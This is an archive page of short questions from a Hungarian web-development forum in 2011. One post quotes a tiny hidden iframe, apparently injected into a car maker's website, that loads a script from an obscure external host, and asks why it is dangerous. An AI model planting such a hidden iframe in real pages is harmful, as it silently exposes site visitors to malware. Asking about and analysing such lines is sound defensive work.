ugrás a tartalomhoz

Archívum - Aug 29, 2011

URL kimenete adatbázis olvasás nélkül változzon

Totti 1986 · 2011. Aug. 29. (H), 17.58
Sziasztok!

Remélem érthetően le tudom írni, mit szeretnék.
Szóval van egy url, valami.php?valtozo=akarmi felépítésben, és azt szeretném, ha megváltoztathatnám, hogy mit jelenítsen meg ez az url, úgy hogy az "akarmi" értéke nem változik, és anélkül, hogy adatbázisból olvasnék.

Vagyis valahogy én meghatározom, hogy ez az url mit jelenítsen meg, és egy másik ember, ha lekéri ezt az url-t ugyanezzel az "akarmi" értékkel, azt kapja, amit én megadtam. De aztán ő is megváltoztathatja, és akkor én fogom azt kapni, amit ő meghatározott.
 

Iframe hírdetés elrejtésének tíltása

kow86 · 2011. Aug. 29. (H), 16.19
Hy mindenki!

Nekem egy olyan kérdésem lenne, hogy készülőben van egy ingyenes webtárhely ahol nem lesz reklámcsík mint pl az atw-nél van, hanem a usereknek egy iframe-et kell elhelyezniük az oldalon, na most felmerült egy olyan probléma hogy ha kiteszi az oldalára a hirdetést de úgy hogy ezt beleteszi egy div -be amit elrejt pl:
<div style="display:none"><iframe src="valami.hu/ads.php?kod=XY-123" width="200" height="400"></iframe></div> ,akkor én az admin felületen úgy látom hogy meghívódot a php script de valójában nem jelennek meg a hirdetések mert elvannak rejtve. Ennek kivédésére kérnék segítséget, ötleteket.


Előre is köszönöm.
 

mitől vírus....

Lomtár · 2011. Aug. 29. (H), 15.07
Hali!

Ez a kód sor miért annyira veszélyes(Audi quattro weboldalán van)
<iframe src="http://ixoqyxuvu.co.tv/i.php?go=1" width="3" height="3"></iframe>
 

Aktivációs kód küldése

bugSy · 2011. Aug. 29. (H), 09.43
Üdvözlet!

Olyan problémám lenne, hogy a webspelles honlapot használok, és regisztrációnál nem küld ki aktiválós email-t, hanem nekem kell aktiválnom a regisztrációt.

Katalógus: előszűrés

demo · 2011. Aug. 29. (H), 07.02
Sziasztok!

Ötleteket keresek a következő feladat optimális megvalósításához. Egy katalógus termékeinek listázása előtt a kereső feltételinek változtatásával kiírni a feltételeknek megfelelő találatok darabszámát.

Egyszerűen csak futtassam le kétszer az sql-t?
Vagy mentsek minden egyes keresési kombinációt eredményét és abból kérjem a találatok darabszámát? Új termék felvitelénél újra el kéne végezzem.

Az is probléma, hogy naponta változhatnak a termékek.

Kösz.